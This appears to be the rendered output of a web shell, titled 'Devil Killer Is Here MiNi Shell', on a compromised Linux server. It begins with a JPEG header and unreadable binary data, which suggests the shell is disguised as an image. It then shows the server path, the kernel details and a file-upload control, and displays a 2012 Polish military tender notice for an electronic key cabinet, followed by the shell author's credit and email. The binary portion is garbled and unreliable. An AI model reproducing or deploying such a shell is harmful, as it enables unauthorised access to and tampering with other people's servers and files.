JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121107/437600-N-2012.html

<p class="kh_header"><b>Mińsk Mazowiecki: Dostawa elektronicznego depozytora kluczy z montażem</b><br>
<b>Numer ogłoszenia: 437600 - 2012; data zamieszczenia: 07.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1131 , 05-300 Mińsk Mazowiecki, woj. mazowieckie, tel. 25 74 74 510, faks 25 74 74 520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.23blt@sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elektronicznego depozytora kluczy z montażem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa elektronicznego depozytora kluczy kompletnie wyposażonego, na minimum 90 kluczy z montażem. Sprawa Zp /24/2012
Ponadto Wykonawca w ramach przedmiotowego zamówienia będzie zobowiązany do:
1.	Wykonania montażu depozytora w siedzibie Zamawiającego (w budynku nr 1),
2.	Uruchomienie urządzenia.
3.	Wykonanie bazy danych,
4.	Przeszkolenia osób zarządzających po stronie Zamawiającego, w zakresie obsługi urządzenia.
II.	Wymagania techniczne dla elektronicznych depozytorów kluczy:
1.	Wykonane w sposób estetyczny z lekkiego i trwałego rodzaju metalu w formie szafki z automatycznie podnoszoną i opuszczaną żaluzją;
2.	Depozytor powinien zawierać minimum 90 otworów/gniazd, minimum 90 uchwytów do kluczy do których można trwale dopiąć różnego rodzaju klucze -bez względu na ich wielkość i kształt;
3.	Wyposażony w czytnik kart zbliżeniowych zgodny z systemem funkcjonującym w lokalizacji wskazanej przez Zamawiającego (zgodnyz systemem typu SATEL);
4.	Klucze w depozytorze muszą posiadać blokadę uchwytu klucza w celu uniemożliwienia pobrania przez nieuprawnionego użytkownika;
5.	Klucze do breloka muszą być dopięte w sposób trwały, zawieszka musi pomieścić minimum 4 klucze;
6.	Zapewniać bezstykową (zbliżeniową) identyfikację klucza w otworze, identyfikacja powinna wskazywać prawidłowość włożonego klucza;
7.	Posiadać możliwość pełnego zarządzania depozytorem z terminala sterującego depozytora za pomocą dotykowego terminala sterującego umożliwiającego odczyt historii zdarzeń i konfigurację depozytora
 bez konieczności użycia dodatkowego komputera;
8.	Posiadać dotykowy panel sterujący z wyświetlaczem typu LCD;
9.	Depozytor powinien posiadać pełną bazę danych umożliwiającą odtworzenie tej bazy danych w przypadku awarii komputera administratora;
10.	Umożliwić awaryjne zwolnienie jednego lub wszystkich kluczy w sposób mechaniczny przez uprawnionego administratora w przypadku całkowitej awarii zasilania i wyczerpania akumulatorów;
11.	Możliwość programowania dodatkowych kluczy systemowych;
12.	Terminal powinien sygnalizować błędne włożenie klucza, próby ingerencji w szafkę ( posiadać zabezpieczenie przeciwsabotażowe);
13.	Kształt breloka uniemożliwiający włożenie klucza w sposób inny niż dedykowany;
14.	Posiadać funkcję podświetlania wskazanego klucza do pobrania oraz możliwość deponowania kluczy w dowolnym gnieździe;
15. Zapewniać  zdalne  24   godzinne  zarządzanie   dostępami  do  kluczy  przez administratora systemu;
16. Dostęp do kluczy musi odbywać się jedynie:
a)	po identyfikacji i uwierzytelnieniu użytkownika za pomocą identyfikatora osobistego (karty zbliżeniowej) oraz opcjonalnie indywidualnego pin-u lub karty i pinu;
b)	po zdalnym wydaniu komendy przez administratora systemu;
c)	zdanie klucza do szafki powinno odbywać się po zidentyfikowaniu osoby zdającej;
17.	Ponadto system powinien zapewniać:
a)	właściwą pracę przy wilgotności od 5 do 95 % i temperaturze od +5 
do + 450 C;
b)	odporność na zmianę polaryzacji stałego napięcia zasilającego;
c)	sygnalizować wykryte uszkodzenia w czasie nie dłuższym 
niż 20 sekund;
d)	generować alarmy ze zdarzeń będących anomaliami w pracy systemu (np. brak kluczy w zdefiniowanych uprzednio oknach czasowych, usterek technicznych, nieprawidłowej obsługi);
e)	podtrzymanie zasilania z akumulatora na min. 36 godzin;
f)	możliwość testowania urządzeń, zasilacza i akumulatora;
g)	samoczynne przełączanie zasilania ze źródła podstawowego 
na rezerwowe i odwrotnie;
h)	sygnalizację dźwiękową i świetlną we wskazanym miejscu 
przez Zamawiającego awarię zasilania podstawowego;
i)	sygnalizację dźwiękową i świetlną próby nieuprawnionego pobrania klucza;
j)	posiadać własne zabezpieczenie nadprądowe;
k)	posiadać funkcję elektronicznego uwalniania wszystkich kluczy 
w sytuacjach kryzysowych i zagrożenia;
l)	posiadać wbudowany systemowy zegar czasu rzeczywistego;
III.       Wymagania dotyczące wyposażenia elektronicznego dla depozytora kluczy:
1.	Baza danych działający w systemie Windows XP lub nowszym, zapewniający możliwość zdalnego zarządzania systemem deponowania kluczy, gromadzenia zapisanych w systemie bazy danych (zestawy typu laptop);
2.	Licencję oprogramowania na instalowany elektroniczny depozytor kluczy, 
wraz z wersją instalacyjną na oddzielnym nośniku;
3.	Licencja na oprogramowanie operacyjne zestawów komputerowych 
wraz z wersją instalacyjną;
4.	Zestaw do samodzielnego demontowania i montowania kluczy do breloków systemowych;
5.	Zestaw zapasowych (dodatkowych) uchwytów kluczy (breloków)  systemowych w ilości minimum 5 szt. do depozytora;
6.	Zestaw zapasowych (dodatkowych) zabezpieczeń (zacisków) do zarobienia kluczy systemowych w ilości 50 szt. do depozytora;
7.	Czytnik administratora do wprowadzania kart użytkowników do bazy danych na stacji roboczej administratora.
IV.       Wymagania   oprogramowania   systemowego   dla  elektronicznego depozytora kluczy:
1.	Oprogramowanie w języku polskim, typu podpowiadającego;
2.	Bezpłatna aktualizacja oprogramowania w czasie trwania gwarancji;
3.	Zapewniać tworzenie grup pracowników w celu sprawnego i efektywnego zarządzania danymi;
4.	Umożliwiać przypisywanie ustawień kluczy dla użytkowników uwzględniając dowolne ramy czasowe;
5.	Zawierać możliwość udostępnienia jednego lub wielu kluczy jednemu 
lub wielu użytkownikom;
6.	Umożliwiać    alarmowe pobieranie kluczy w przypadku zagrożenia (ewakuacja);
7.	Możliwość indywidualnego ustawienia przedziałów czasowych dostępu 
dla użytkowników systemu;
8.	Zapewniać monitorowanie stanu szafki poprzez sieć Ethernet, a także rejestrować (archiwizować) wszystkie zdarzenia (zmiany) w systemie 
12 miesięcznym;
9.	Uwzględniać przygotowywanie raportów z historii działania depozytorów 
na podstawie opracowanych indywidualnie filtrów;
10.	Posiadać możliwość importu i eksportu danych do plików tekstowych.
V.        Wymagania konserwacyjno obsługowe i eksploatacyjne elektronicznego depozytora kluczy:
1.	Prowadzenie bezpłatnego serwisu gwarancyjnego w miejscu zamontowania przez okres minimum 24 miesiące ( 24 godziny na dobę bez dodatkowych opłat);
2.	Dojazd serwisu w ciągu do 4 godzin od wezwania;
3.	Możliwość dokupienia dodatkowych uchwytów i kluczy systemowych;
VI.	Wymagania dotyczące zasad funkcjonowania elektronicznego depozytora kluczy:
1.	Prowadzenie wykazu osób uprawnionych do pobierania kluczy zawierającego poniższe dane:
a)	liczbę porządkową;
b)	nr klucza;
c)	nr pomieszczenia;
d)	stopień imię i nazwisko osoby uprawnionej do pobrania klucza;
e)	nr referentki użytkownika;
f)	informacja gdzie znajduje się klucz zapasowy (dodatkowa informacja);
2.	Prowadzenie książki ewidencji kluczy;
a)	liczbę porządkową zdarzenia;
b)	nr pobieranego klucza;
c)	stopień imię i nazwisko osoby pobierającej;
d)	stopień imię i nazwisko osoby zdającej;
e)	czas pobrania i czas zdania klucza;
f)	data pobrania i data zdania klucza;
VII.	Wymagania dotyczące montażu elektronicznego depozytora kluczy:
1. Dokonanie montażu szafy we wskazanym przez Zamawiającego miejscu 
z wykonaniem pełnego okablowania niezbędnego do prawidłowej pracy systemu 
oraz przeprowadzenie testów prawidłowego działania.
 
2. Uruchomienie systemu z utworzeniem bazy danych;

 VIII.     Pozostałe wymagania dotyczące elektronicznego depozytora 		       kluczy:
1.	Wykonanie dokumentacji powykonawczej systemu w wersji wydrukowanej i na CD 
z załączonym oświadczeniem o zgodności montażu z obowiązującymi przepisami;
2.	Dostarczenie instrukcji użytkowania systemu dla administratora z ujętymi procedurami postępowania w sytuacjach awaryjnych w wersji wydrukowanej;
3.	Przeszkolenie osób zarządzających zrealizować w miejscu montażu elektronicznego depozytora kluczy;
4.	Zamawiający nie dopuszcza połączeń kluczy z brelokami za pomocą linek stalowych.

	IX.	Zakres dostawy:

Lp	Asortyment	Ilość
1	Depozytor na minimum 90 kluczy	1kpl
2	Czytnik administratora	1szt.
3	Oprogramowanie zarządzające	1zestaw
4	Dodatkowe uchwyty klucza (breloki)	5 szt.
5	Zestaw zapasowych (dodatkowych) zabezpieczeń (zacisków) do zarobienia kluczy systemowych	50 szt./kpl
6	Zestaw do samodzielnego demontowania i montowania kluczy do breloków systemowych	1szt./kpl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.42.17.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na załączniku nr 2 do siwz); W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania wykonania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w należyty sposób dwóch  zamówień polegających na dostawie artykułów będących przedmiotem zamówienia w w/w postępowaniu. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na załączniku nr 2 do siwz); W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na załączniku nr 2 do siwz); W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na załączniku nr 2 do siwz); W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.23blt@sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 1131 05-300 Mińsk Mazowiecki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2012 godzina 09:00, miejsce: Ofertę należy złożyć w Jednostce Wojskowej 1131, 05-300 Mińsk Mazowiecki; (kancelaria jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com